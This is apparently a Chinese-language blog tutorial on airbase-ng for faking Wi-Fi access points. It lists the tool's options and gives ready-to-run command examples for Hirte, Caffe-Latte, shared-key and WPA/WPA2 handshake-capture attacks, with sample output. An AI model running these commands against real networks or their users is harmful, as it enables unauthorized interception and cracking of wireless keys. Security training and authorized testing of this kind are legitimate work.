airbase-ng 是仿造一組 AP,例如:實際有一名為 syslink 的 AP ,平常 Client 透過 syslink 上網,則我們也利用 airbase-ng 偽造一個名為 syslink 的 AP ,基於許多 Client 的 Wifi 會在搜尋到曾經連線過的 AP 時,會自動嘗試連線,所以利用 airbase-ng 也會讓 Client 試著從這個假的 AP 進行連線,而我們的假 AP 就可以擷取 Client 端送來的要求驗證資料。
airbase-ng 在進行無線網路滲透有很重要的地位,如果沒有 airbase-ng ,airodump-ng 可能無法收集到足夠的封包,如果沒有足夠的封包,aircrack-ng 就無用武之地!
使用此方法,如果真正的 AP 也在活動中,彼此可能產生干擾,所以未經授權,不可對現實AP 進行仿造。
airbase-ng 利用偽造 AP 方式可以實現下列攻擊(當然要搭配其他工具啦!)
基本語法:airbase-ng <options> <Monitor_Interface>
常用參數:
| -a bssid | 指定偽造 的 MAC address,如果不指定 bssid,則使用目前的監聽介面(mon0) MAC address |
| -i iface | 指定監聽介面(mon0) |
| -w WEP_key | 指定 WEP 的連線密碼字串 |
| -h MAC | 在中間人攻擊模式(man-in-the-middle MITM),指定真實 AP 的 MAC address(見 karmsploit攻擊) |
| -f {allow | disallow} | 預設是 allow,所以 Client 可否存取本偽造 AP 就由 -d / -D 參數指定,如果設為 disallow,則會反向指定 -d / -D 的結果。 |
| -W {0 | 1} | 要(1) 或 不要(0)設定 WEP 的信標旗標 (default: auto) |
| -q | 靜音模式,螢幕不顯示訊息 |
| -v | 詳細模式,螢幕顯示更詳細資訊 |
| -A | 啟用 Ad-Hoc 模式(封包轉送,類似有線的路由器) |
| -Y {in | out | both} | 會建立第二組 AP 接口,提供封包對其他本機的網路介或工具進行轉送或注入的處理 |
| -c channel | 指定偽造 AP 使用的 channel |
| -X | 隱藏偽造 AP 的 ESSID(只有預先設定此 ESSID 的Client 才能連線,其它 Client 無法掃描到此 AP |
| -s | 強制要求授權,此時使用 開放驗證的 Client 將不被接受連線。 |
| -S | 指定 shared key 最低長度(default: 128byte),其值由 16 至 1480 bytes, |
| -L | Caffe-Latte 攻擊模式,請參考 ariplay-ng -6 的攻擊模式,在接收到 Client 封包調整後再回送給 Client ,而讓它吐出更多請求封包,進以破解連線密碼。(參考下一條) |
| -x nbpps | 對於 -L 模式,指定回送的速率(每秒之封包數) (default: 100) |
| -N | Hirte attack (cfrag attack)碎片攻擊模式,利用接收到的 Client 端的 ARP 封包,萃取出 PRGA,再產生成更多對 Client 的請求封包,而讓 Client 再回應更多封包 |
| -y | 不回應利用廣播式掃描 AP 的請求(不回應 Client) |
| -0 | 傳送信標(beacon)時設定所有 WPA,WEP,open 的標籤(tag),此參數不能和 -z / -Z 合併使用 |
| -z type | 指定 WPA1 的標籤, 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104 |
| -Z type | 跟 -z 一樣,但是針對 WPA2 |
| -V type | 指定偽造 AP 的編碼(EAPOL)方式 1=MD5 2=SHA1 3=auto |
| -F prefix | 將所有收到及傳回的訊框(frame) 寫到指定的檔案( pcap file) |
| -P | 回應所有探尋,就算 Client 的探尋有指定 ESSID,亦對其回應 |
| -I interval | 指定傳送每一個信標 之間的間隔時間(ms) |
| -C seconds | enables beaconing of probed ESSID values (requires -P) |
何謂 Beacon Frames
The beacon frame contains the ESSID in case exactly one ESSID is specified, if several are set, the ESSID will be hidden in the beacon frame with a length of 1. If no ESSID is set, the beacon will contain “default” as ESSID, but accept all ESSIDs in association requests.
過濾參數:
| -b <MAC> | 只處理符合此 MAC 的 AP 通訊資料 |
| -B <file> | 同 -b ,但 MAC 清單來自外部檔案 |
| -d <MAC> | 只處理符合此 MAC 的 Client 通訊資料 |
| -D <file> | 同 -d ,但 MAC 清單來自外部檔案 |
| -e <ESSID> | 只處理符合此 ESSID(代碼) 的 AP 通訊資料 |
| -E <file> | 同 -e ,但 MAC 清單來自外部檔案 |
使用例:
協助 airodump-ng 快速取得更多封包
在 Console 1 執行:
airbase-ng -c 9 -e teddy -N -W 1 rausb0
在 Console 2 執行:
airodump-ng -c 9 -d 00:06:62:F8:1E:2C -w cfrag wlan0
利用碎片攻擊以藉以擷取WEP的帳密:
在 Console 1 執行:
airbase-ng -c 9 -e teddy -N -W 1 -A rausb0
在 Console 2 執行:
airodump-ng -c 9 -d 00:06:62:F8:1E:2C -w cfrag wlan0
進行 Caffe Latte 攻擊
在 Console 1 執行:
airbase-ng -c 9 -e teddy -L -W 1 rausb0
在 Console 2 執行:
airodump-ng -c 9 -d 00:06:62:F8:1E:2C -w cfrag wlan0
擷取 Share Key
Console 1 執行:
root@kali104:~#airbase-ng -c 9 -e teddy -s -W 1 wlan0
15:08:31 Created tap interface at0
15:13:38 Got 140 bytes keystream: 00:0F:B5:88:AC:82
15:13:38 SKA from 00:0F:B5:88:AC:82
15:13:38 Client 00:0F:B5:88:AC:82 associated to ESSID: "teddy"
15:08:31 Created tap interface at0
15:13:38 Got 140 bytes keystream: 00:0F:B5:88:AC:82
15:13:38 SKA from 00:0F:B5:88:AC:82
15:13:38 Client 00:0F:B5:88:AC:82 associated to ESSID: "teddy"
在 Console 2 執行:
airodump-ng -c 9 wlan0
WPA Handshake Capture
airbase-ng -c 9 -e teddy -z 2 -W 1 rausb0
airodump-ng -c 9 -d 00:C0:C6:94:F4:87 -w cfrag wlan0
WPA2 Handshake Capture
airbase-ng -c 9 -e teddy -Z 4 -W 1 rausb0
airodump-ng -c 9 -d 00:C0:C6:94:F4:87 -w cfrag wlan0
利用 airodump-ng 擷取的封包,尚需由 aircrack-ng 進行破解!
沒有留言:
張貼留言